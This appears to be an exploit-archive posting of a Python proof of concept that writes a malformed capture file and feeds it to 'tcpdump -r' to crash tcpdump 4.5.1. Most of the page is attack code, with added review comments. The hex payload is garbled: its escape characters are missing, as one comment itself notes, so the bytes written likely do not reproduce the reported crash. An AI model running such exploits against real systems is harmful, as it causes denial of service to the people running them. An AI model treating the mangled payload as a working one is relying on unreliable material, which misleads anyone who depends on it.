TCPDump 4.5.1 Crash Proof Of Concept
Posted on 01 June 2016
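# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS

from subprocess import call
from shlex import split
from time import sleep


def crash():
    """Write the capture file ``crash`` and have tcpdump read it back.

    The file is created in the current working directory and then passed
    to ``tcpdump -r``, so the code under test is tcpdump's saved-capture
    reader, not live capture. The outcome is reported from the child's
    exit status, which lets the same run confirm whether an installed
    build is still affected or already handles the input.

    Returns:
        None. Results are printed to stdout.
    """
    command = 'tcpdump -r crash'

    # NOTE(review): the literals are reproduced exactly as listed. They read
    # as plain ASCII text ("x" followed by hex digits), which suggests the
    # escape characters were lost when the page was extracted -- confirm
    # against the original advisory before treating the written file as the
    # capture that produced the reported crash.
    # Bytes literals: the file is opened in binary mode, and on Python 3 a
    # text string cannot be written to a binary file (TypeError).
    payload = b'xd4xc3xb2xa1x02x00x04x00x00x00x00xf5xff'
    payload += b'x00x00x00Ix00x00x00xe6x00x00x00x00x80x00'
    payload += b'x00x00x00x00x00x08x00x00x00x00<x9c7@xffx00'
    payload += b'x06xa0rx7fx00x00x01x7fx00x00xecx00x01xe0x1a'
    payload += b"x00x17g+++++++x85xc9x03x00x00x00x10xa0&x80x18'"
    payload += b"xfe$x00x01x00x00@x0cx04x02x08 ', 'x00x00x00x00"
    payload += b'x00x00x00x00x01x03x03x04'

    with open('crash', 'wb') as capture:
        capture.write(payload)

    try:
        status = call(split(command))
    except OSError:
        # Raised when tcpdump cannot be started (not installed, not on PATH,
        # not executable). A bare ``except`` here would also have swallowed
        # KeyboardInterrupt and programming errors.
        print("Error: Something has gone wrong!")
        return

    # subprocess reports a child killed by signal N as return code -N on
    # POSIX, so only a negative status means tcpdump actually crashed.
    # Printing success unconditionally would mislabel a patched build.
    if status < 0:
        print("Exploit successful! ")
    else:
        print("tcpdump exited with status %d and did not crash" % status)


def main():
    """Print the banner, pause briefly, then run the crash check."""
    print("Author: David Silveiro ")
    print(" tcpdump version 4.5.1 Access Violation Crash ")

    sleep(2)

    crash()


if __name__ == "__main__":
    main()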